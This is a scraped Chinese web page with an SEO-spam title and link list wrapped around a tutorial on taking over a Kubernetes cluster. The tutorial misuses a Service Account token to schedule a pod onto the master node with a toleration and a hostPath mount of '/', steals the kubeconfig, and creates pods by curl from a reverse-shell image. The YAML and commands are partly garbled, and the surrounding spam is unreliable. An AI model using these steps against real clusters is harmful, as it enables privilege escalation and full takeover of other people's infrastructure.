当前位置: 首页 > news >正文

网站开发者工作描述域名查询ip地址138

news 2025/12/28 11:54:03
网站开发者工作描述,域名查询ip地址138,设计师家园官网,常州建站价格01、概述 Service Account本质是服务账号#xff0c;是Pod连接K8s集群的凭证。在默认情况下#xff0c;系统会为创建的Pod提供一个默认的Service Account#xff0c;用户也可以自定义Service Account#xff0c;与Service Account关联的凭证会自动挂载到Pod的文件系统中。 … 01、概述 Service Account本质是服务账号是Pod连接K8s集群的凭证。在默认情况下系统会为创建的Pod提供一个默认的Service Account用户也可以自定义Service Account与Service Account关联的凭证会自动挂载到Pod的文件系统中。 当攻击者通过某个web应用获取到一个Pod权限时如果RBAC权限配置不当Pod关联的Service Account拥有创建Pod的权限。攻击者就可以使用污点容忍的方式将挂载根目录的恶意Pod调度到Master节点获取Master 节点上的 kubeconfig 文件从而直接接管整个集群。 02、攻击场景 1Service Account赋予bypass对test名称空间拥有管理员权限。 kubectl create serviceaccount bypass -n test kubectl create rolebinding sa-admin --clusterrolecluster-admin --serviceaccounttest:bypass -n test kubectl get pod --assystem:serviceaccount:test:bypass 2在Pod中使用自定义的Service Account。 # pod-sa.yaml apiVersion: v1 kind: Pod metadata:name: pod-sanamespace: test spec:serviceAccountName: bypasscontainers:- name: ubuntuimage: ubuntu:20.04command: [/bin/sh,-c,sleep 24h] 3在Pod创建时Service Account关联的凭证会挂载到 /var/run/secrets/kubernetes.io/serviceaccount/ 目录其中ca.crt是证书、namespace是Pod所属的命名空间token是访问API Server的令牌 。 03、攻击过程 1攻击方式kubectl 命令行操作 在Pod中下载kubectl命令行工具使用kubectl auth检查权限拥有当前名称空间中所有执行操作的权限这就具备了获取集群权限的条件。 编写一个yaml文件将节点的根目录挂载到容器的/data 目录使用污点容忍度创建恶意Pod来对Master节点进行横向控制。 如下图将构建的Pod成功调度到Mater节点。 yaml文件内容 apiVersion: v1 kind: Pod metadata:name: pod1 spec:nodeSelector:node-role.kubernetes.io/master: tolerations:- key: node-role.kubernetes.io/masteroperator: Existseffect: NoSchedulecontainers:- image: nginx:1.20name: pod1volumeMounts:- mountPath: /dataname: datavolumes:- name: datahostPath:path: / 攻击者成功窃取 kubeconfig 文件将获得对 Kubernetes 集群的完全控制权限从而能够任意操控和管理整个集群。 2攻击方式curl 命令操作 首先创建一个包含恶意代码的镜像,用于反弹Shell利用curl 命令操作 Kubernetes API创建Pod。 TOKEN$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)用curl创建pod curl -k --header Authorization: Bearer $TOKEN \ -H Content-Type: application/yaml \ -s -w 状态码是:%{http_code}\n \ -d $(cat /tmp/111.yaml) \https://10.96.0.1/api/v1/namespaces/test/pods/ 远程监听端口来接收Master节点创建的Pod反弹的shell连接成功获取到kubeconfig文件。
http://www.w-s-a.com/news/973280/

相关文章:

  • 网站建设和维护工作内容网站的空间与域名
  • 济南做门户网站开发公司网页发布的步骤
  • 江苏省交通厅门户网站建设管理办法做的网站怎么让百度收录
  • 关于怎么做网站网站site的收录数量要多远索引量
  • 传世网站建设阳光创信-网站建设首选品牌
  • 周口建设网站中国装修公司十大排名
  • wordpress自助发卡青浦网站优化
  • 南京建设银行公积金查询网站wordpress加载插件下载
  • 做网站怎么那么难网站的建设与管理的心得体会
  • 黄冈网站建设哪家快些网站规划与建设评分标准
  • 建站平台 绑定域名怎么在手机上做网站
  • 做电影网站违法吗莱芜 网站
  • 品牌咨询公司泉州seo不到首页不扣费
  • 做网站做一个什么主题的怎样搭建一个企业网站
  • 做设计的有什么网站桂林论坛网站有哪些
  • 做的网站不能放视频开发公司春联
  • 重庆装修房子可以提取公积金吗长沙优化官网公司
  • 做外贸的网站都有哪些带后台的html网站源码
  • 厦门百度快速优化排名手机系统优化工具
  • 宁波网站制作公司推荐公司建站多少钱
  • 网络营销薪酬公司温州网站优化定制
  • 橙色在网站中的应用淘宝客绑定网站备案号
  • 杭州视频网站建设成都设计院排行
  • 慈溪建设网站盘丝洞app破解无限盘币
  • 关于服装店网站建设的策划方案seo关键词优化软件官网
  • 丰台高端网站建设土巴兔装修贵吗
  • 宽屏网站mysqli pdo wordpress
  • 2022年没封网站直接进入赣州网吧
  • 河南省建设厅证件证件查询网站硬件开发是什么意思
  • tp5做企业网站宿迁房产网租房信息